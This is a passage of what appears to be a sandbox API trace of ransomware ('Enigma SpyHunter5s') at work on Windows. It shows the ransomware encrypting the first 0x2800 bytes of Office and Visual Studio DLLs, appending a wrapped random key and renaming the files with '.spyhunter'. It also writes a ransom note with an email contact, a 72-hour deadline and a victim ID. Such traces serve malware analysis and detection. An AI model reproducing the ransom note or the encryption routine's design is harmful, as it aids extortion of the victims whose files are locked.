lpNumberOfBytesRead=0x248e65c*=0x2800, lpOverlapped=0x0) returned 1 [0165.930] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.930] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e65c*=0x2800, lpOverlapped=0x0) returned 1 [0165.931] GetProcessHeap () returned 0x2c0000 [0165.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.931] WriteFile (in: hFile=0x178, lpBuffer=0x248e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x248e69c*, lpNumberOfBytesWritten=0x248e65c*=0x4, lpOverlapped=0x0) returned 1 [0165.934] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e65c*=0x30, lpOverlapped=0x0) returned 1 [0165.934] CloseHandle (hObject=0x178) returned 1 [0165.934] GetProcessHeap () returned 0x2c0000 [0165.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.934] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.spyhunter") returned 151 [0165.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll.spyhunter")) returned 1 [0165.935] GetProcessHeap () returned 0x2c0000 [0165.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.936] GetProcessHeap () returned 0x2c0000 [0165.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.936] GetProcessHeap () returned 0x2c0000 [0165.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e93830 | out: hHeap=0x2c0000) returned 1 [0165.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6a0 | out: pbBuffer=0x248e6a0) returned 1 [0165.936] GetProcessHeap () returned 0x2c0000 [0165.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e698*=0x30) returned 1 [0165.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL") returned 63 [0165.937] StrStrW (lpFirst="PPSLAX.DLL", lpSrch=".txt") returned 0x0 [0165.938] GetProcessHeap () returned 0x2c0000 [0165.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.938] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e65c*=0x2800, lpOverlapped=0x0) returned 1 [0165.953] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.953] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e65c*=0x2800, lpOverlapped=0x0) returned 1 [0165.953] GetProcessHeap () returned 0x2c0000 [0165.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.954] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.954] WriteFile (in: hFile=0x178, lpBuffer=0x248e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x248e69c*, lpNumberOfBytesWritten=0x248e65c*=0x4, lpOverlapped=0x0) returned 1 [0166.010] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e65c*=0x30, lpOverlapped=0x0) returned 1 [0166.011] CloseHandle (hObject=0x178) returned 1 [0166.011] GetProcessHeap () returned 0x2c0000 [0166.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.011] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL.spyhunter") returned 73 [0166.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll.spyhunter")) returned 1 [0166.013] GetProcessHeap () returned 0x2c0000 [0166.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.013] GetProcessHeap () returned 0x2c0000 [0166.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.013] GetProcessHeap () returned 0x2c0000 [0166.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5308 | out: hHeap=0x2c0000) returned 1 [0166.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e698 | out: pbBuffer=0x248e698) returned 1 [0166.013] GetProcessHeap () returned 0x2c0000 [0166.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e690*=0x30) returned 1 [0166.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll") returned 76 [0166.015] StrStrW (lpFirst="ONBttnIELinkedNotes.dll", lpSrch=".txt") returned 0x0 [0166.016] GetProcessHeap () returned 0x2c0000 [0166.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.016] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e654*=0x2800, lpOverlapped=0x0) returned 1 [0166.261] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.261] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e654*=0x2800, lpOverlapped=0x0) returned 1 [0166.261] GetProcessHeap () returned 0x2c0000 [0166.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.261] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.261] WriteFile (in: hFile=0x178, lpBuffer=0x248e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x248e694*, lpNumberOfBytesWritten=0x248e654*=0x4, lpOverlapped=0x0) returned 1 [0166.285] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e654*=0x30, lpOverlapped=0x0) returned 1 [0166.286] CloseHandle (hObject=0x178) returned 1 [0166.286] GetProcessHeap () returned 0x2c0000 [0166.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.286] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll.spyhunter") returned 86 [0166.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll.spyhunter")) returned 1 [0166.287] GetProcessHeap () returned 0x2c0000 [0166.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.287] GetProcessHeap () returned 0x2c0000 [0166.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.287] GetProcessHeap () returned 0x2c0000 [0166.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea8f8 | out: hHeap=0x2c0000) returned 1 [0166.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e698 | out: pbBuffer=0x248e698) returned 1 [0166.287] GetProcessHeap () returned 0x2c0000 [0166.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e690*=0x30) returned 1 [0166.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.288] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL") returned 61 [0166.288] StrStrW (lpFirst="NAME.DLL", lpSrch=".txt") returned 0x0 [0166.288] GetProcessHeap () returned 0x2c0000 [0166.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.288] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e654*=0x2800, lpOverlapped=0x0) returned 1 [0166.313] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.313] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e654*=0x2800, lpOverlapped=0x0) returned 1 [0166.313] GetProcessHeap () returned 0x2c0000 [0166.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.313] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.313] WriteFile (in: hFile=0x178, lpBuffer=0x248e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x248e694*, lpNumberOfBytesWritten=0x248e654*=0x4, lpOverlapped=0x0) returned 1 [0166.338] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e654, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e654*=0x30, lpOverlapped=0x0) returned 1 [0166.339] CloseHandle (hObject=0x178) returned 1 [0166.346] GetProcessHeap () returned 0x2c0000 [0166.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.347] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL.spyhunter") returned 71 [0166.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll.spyhunter")) returned 1 [0166.348] GetProcessHeap () returned 0x2c0000 [0166.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.348] GetProcessHeap () returned 0x2c0000 [0166.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.348] GetProcessHeap () returned 0x2c0000 [0166.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5240 | out: hHeap=0x2c0000) returned 1 [0166.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e690 | out: pbBuffer=0x248e690) returned 1 [0166.348] GetProcessHeap () returned 0x2c0000 [0166.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e688*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e688*=0x30) returned 1 [0166.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.350] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL") returned 64 [0166.350] StrStrW (lpFirst="IEAWSDC.DLL", lpSrch=".txt") returned 0x0 [0166.350] GetProcessHeap () returned 0x2c0000 [0166.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0166.350] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e64c*=0x2800, lpOverlapped=0x0) returned 1 [0166.544] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.544] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e64c*=0x2800, lpOverlapped=0x0) returned 1 [0166.545] GetProcessHeap () returned 0x2c0000 [0166.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0166.545] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.545] WriteFile (in: hFile=0x178, lpBuffer=0x248e68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e64c, lpOverlapped=0x0 | out: lpBuffer=0x248e68c*, lpNumberOfBytesWritten=0x248e64c*=0x4, lpOverlapped=0x0) returned 1 [0166.628] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e64c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e64c*=0x30, lpOverlapped=0x0) returned 1 [0166.628] CloseHandle (hObject=0x178) returned 1 [0166.628] GetProcessHeap () returned 0x2c0000 [0166.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.628] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.spyhunter") returned 74 [0166.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll.spyhunter")) returned 1 [0166.630] GetProcessHeap () returned 0x2c0000 [0166.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.631] GetProcessHeap () returned 0x2c0000 [0166.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.631] GetProcessHeap () returned 0x2c0000 [0166.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e056f8 | out: hHeap=0x2c0000) returned 1 [0166.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.633] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.633] WriteFile (in: hFile=0x178, lpBuffer=0x248e5c3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x248e5c3*, lpNumberOfBytesWritten=0x248e6ec*=0x127, lpOverlapped=0x0) returned 1 [0166.635] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.635] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e6ec*=0x2ac, lpOverlapped=0x0) returned 1 [0166.635] CloseHandle (hObject=0x178) returned 1 [0166.635] GetProcessHeap () returned 0x2c0000 [0166.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5190 | out: hHeap=0x2c0000) returned 1 [0166.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e688 | out: pbBuffer=0x248e688) returned 1 [0166.635] GetProcessHeap () returned 0x2c0000 [0166.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e680*=0x30) returned 1 [0166.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0166.636] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL") returned 70 [0166.636] StrStrW (lpFirst="VVIEWRES.DLL", lpSrch=".txt") returned 0x0 [0166.636] GetProcessHeap () returned 0x2c0000 [0166.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.637] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e644*=0x2800, lpOverlapped=0x0) returned 1 [0166.665] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.666] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e644*=0x2800, lpOverlapped=0x0) returned 1 [0166.666] GetProcessHeap () returned 0x2c0000 [0166.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.666] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.666] WriteFile (in: hFile=0x178, lpBuffer=0x248e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x248e684*, lpNumberOfBytesWritten=0x248e644*=0x4, lpOverlapped=0x0) returned 1 [0166.671] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e644, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e644*=0x30, lpOverlapped=0x0) returned 1 [0166.671] CloseHandle (hObject=0x178) returned 1 [0166.671] GetProcessHeap () returned 0x2c0000 [0166.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.671] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.spyhunter") returned 80 [0166.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll.spyhunter")) returned 1 [0166.672] GetProcessHeap () returned 0x2c0000 [0166.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.673] GetProcessHeap () returned 0x2c0000 [0166.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0166.673] GetProcessHeap () returned 0x2c0000 [0166.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e700 | out: hHeap=0x2c0000) returned 1 [0166.673] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e688 | out: pbBuffer=0x248e688) returned 1 [0166.673] GetProcessHeap () returned 0x2c0000 [0166.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0166.673] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e680*=0x30) returned 1 [0166.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM" (normalized: "c:\\program files (x86)\\microsoft 